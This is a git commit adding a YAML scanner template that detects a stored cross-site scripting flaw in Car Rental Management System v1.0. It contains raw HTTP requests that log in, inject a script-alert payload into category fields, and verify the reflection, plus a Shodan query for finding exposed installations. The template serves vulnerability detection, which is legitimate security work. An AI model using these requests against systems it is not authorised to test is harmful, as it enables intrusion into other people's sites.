Merge pull request #4964 from arafatansari/patch-29

Create carrental-xss.yaml
2022-08-01 11:09:15 +05:30 · 2022-08-01 11:09:15 +05:30 · f7af874084
parent b704451beb 4c51fe5c08
commit f7af874084
1 changed files with 66 additions and 0 deletions
--- a/vulnerabilities/other/carrental-xss.yaml
+++ b/vulnerabilities/other/carrental-xss.yaml
@ -0,0 +1,66 @@
+id: carrental-xss
+
+info:
+  name: Car Rental Management System v1.0 - Stored Cross Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Car Rental Management System v1.0 is vulnerable to Cross Site Scripting via admin/ajax.php?action=save_category in Name and Description Parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/49546
+    - https://www.sourcecodester.com/
+  metadata:
+    verified: true
+    shodan-query: http.html:"Car Rental Management System"
+  tags: xss,cms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /admin/ajax.php?action=save_category HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCMJ5bh3B6m9767Em
+
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="id"
+
+
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="name"
+
+        </script><script>alert(document.domain)</script>
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="description"
+
+        <script>alert(document.domain)</script>
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em--
+
+      - |
+        GET /admin/index.php?page=categories HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<p>Name: <b></script><script>alert(document.domain)</script></b>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200